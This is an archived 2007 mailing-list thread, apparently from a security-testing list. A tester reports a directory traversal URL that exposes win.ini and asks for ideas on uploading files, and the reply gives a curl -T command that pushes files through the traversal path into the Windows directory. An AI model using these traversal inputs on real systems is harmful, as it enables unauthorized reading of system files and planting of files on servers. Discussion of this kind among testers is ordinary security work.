re: Directory Transversal

From: Sat Jagat Singh <flyingdervish@xxxxxxxxx>
Date: Fri, 19 Oct 2007 08:35:51 -0700 (PDT)

Have you tried curl?

example:
curl -T "{file1,file2}"
http://mycomputer:port#/..//..//..//..//..//..//..//windows/

--- jfvanmeter@xxxxxxxxxxx wrote:

Hello everyone, I'm in the middle of a test on a
app that the following command works on

http://mycomputer:port#/..//..//..//..//..//..//..//windows/win.ini

and it will prompt me to save the file, if i check
my packet capture I see the contents of the file.

So far I've been unable to get a put or post command
to work and was hoping to get some ideas from you
all on things to try.

I've been trying to get nc/telnet and some other
tools to help me with the put comand

Thanks in advance --John

------------------------------------------------------------------------

This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE
today!

http://www.cenzic.com/downloads

------------------------------------------------------------------------

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

------------------------------------------------------------------------
This list is sponsored by: Cenzic

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!

http://www.cenzic.com/downloads
------------------------------------------------------------------------

Prev by Date: Re: Thanks Alex and Jond -- metasploit and proxyport
Next by Date: Re: Directory Transversal
Previous by thread: RE: Directory Transversal
Next by thread: Re: Directory Transversal
Index(es):
- Date
- Thread

Relevant Pages

RE: SQL Server slows down when after the apps runs for several hours.
... SQL SELECT Optimization Levels and Performance ... >that the longer he use the apps in a day, the longer my apps would take ... I found that the 'command' he referred to is ... General SQL Server question; Anybody got a clue what is the cause? ...
(microsoft.public.fox.programmer.exchange)
VB newbie - exposing VB subs to VBA?
... differences of the apps on the two machines, and also that the programs are ... How do I expose VB subs via COM? ... For instance in Excel I ... in on the command line easily enough. ...
(microsoft.public.vb.com)
Cross process communication (sort of)
... I have an application which uses several command line utility apps ... One option to accomplish this is to make the manager app an ActiveX ...
(microsoft.public.vb.general.discussion)
Re: where can I find this...
... The programs I'm running are very plain apps written in vanilla 'c' code ... When I run these from redcon, ... as if I run them directly from a command prompt. ... Redcon's mechanism of grabbing the stdout pipe doesn't ...
(borland.public.delphi.nativeapi)
Re: Console Applications
... Or you open command line first and then execute ... your executable from command line instead of double-clicking it. ... because I want to build Windows apps and not console apps right now? ...
(microsoft.public.dotnet.languages.csharp)